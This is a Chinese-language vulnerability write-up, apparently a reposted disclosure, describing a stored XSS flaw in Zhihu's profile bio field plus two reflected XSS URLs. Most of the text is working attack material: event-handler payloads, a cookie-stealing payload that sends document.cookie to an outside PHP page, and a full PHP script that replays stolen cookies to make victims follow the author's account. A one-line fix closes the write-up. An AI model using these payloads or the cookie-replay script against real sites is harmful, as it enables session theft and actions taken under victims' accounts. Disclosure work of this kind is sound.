知乎在编辑个人资料[一句话介绍]处,没有过滤双引号(过滤了<、>),导致span后内容可控,即形如<span 可控内容></span>,在啤酒@wooyun大神的指点下,终于想到在一句话介绍这里写入test" onmousemove="alert(/xss/) 只要其他用户浏览我的主页,并且鼠标点到介绍位置,就会触发代码执行,xss。 不知道怎样添加外部js,本来是打算这样 <span class="xmsw" title="dd" onmousemove=e=document.createElement('script');e.setAttribute('src','1.js');document.body.appendChild(e); id="test">test</span> 无奈,服务器端有长度限制。
最后还是盗取cookie吧,大家都懂,就不细说了,一句话中写入 x"onmouseout=window.location='http://test/test.php?c='+document.cookie// 最终结果: <span class="xmsw" title="x"onmouseout=window.location='http://test/test.php?c='+document.cookie//"> x"onmouseout=window.location='…</span>
但是盗取cookie有什么用?写一个php证明一下,这个cookie可以做很多事:
<?php
function uc_fopen($url,$post = '', $cookie = '',$limit = 0, $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE) { $return = ''; $matches = parse_url($url); !isset($matches['host']) && $matches['host'] = ''; !isset($matches['path']) && $matches['path'] = ''; !isset($matches['query']) && $matches['query'] = ''; !isset($matches['port']) && $matches['port'] = ''; $host = $matches['host']; $path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/'; $port = !empty($matches['port']) ? $matches['port'] : 80; if($post) { $out = "POST $path HTTP/1.0\r\n"; $out .= "Accept: */*\r\n"; //$out .= "Referer: $boardurl\r\n"; $out .= "Accept-Language: zh-cn\r\n"; $out .= "Content-Type: application/x-www-form-urlencoded\r\n"; $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n"; $out .= "Host: $host\r\n"; $out .="Referer: http://www.zhihu.com/topic/%E7%94%B5%E5%BD%B1\r\n"; $out .= 'Content-Length: '.strlen($post)."\r\n"; $out .= "Connection: Close\r\n"; $out .= "Cache-Control: no-cache\r\n"; $out .= "Cookie: $cookie\r\n\r\n"; $out .= $post; } else { $out = "GET $path HTTP/1.0\r\n"; $out .= "Accept: */*\r\n"; //$out .= "Referer: $boardurl\r\n"; $out .= "Accept-Language: zh-cn\r\n"; $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n"; $out .= "Cookie: $cookie\r\n\r\n"; } $fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout); if(!$fp) { return '';//note $errstr : $errno \r\n } else { stream_set_blocking($fp, $block); stream_set_timeout($fp, $timeout); @fwrite($fp, $out); $status = stream_get_meta_data($fp); if(!$status['timed_out']) { while (!feof($fp)) { if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) { break; } }
$stop = false; while(!feof($fp) && !$stop) { $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit)); $return .= $data; if($limit) { $limit -= strlen($data); $stop = $limit <= 0; } } } @fclose($fp); return $return; } } $cookie = $_GET['c']; echo $cookie; $data ='type=people&id=28bb2b6ff09a5072198351434ab2efff&status=1'; $url='http://www.zhihu.com/follow'; echo uc_fopen($url,$data,$cookie); ?> 这个php主要实现添加对yolfilm账号的关注。当有人浏览我的个人资料,当鼠标移动触发xss,就会跳转到这个页面,进而使用php对yolfilm添加关注。 其他的就不演示了,只要找到操作的数据包,然后使用php脚本提交就可以实现。
www.2cto.com 而且,知乎所有提交输入的地方都没有验证码,导致可以自动提交,这个也给php脚本提交带来了便利....
另外附送两个反射xss: http://www.zhihu.com/people/yolfilm/search?pq=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&type=all http://www.zhihu.com/search?q=%22/%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
修复方案: 过滤" 编码输出 作者 possible
查看更多关于知乎存储型xss及修复 可获取用户cookie信息 - 网站的详细内容...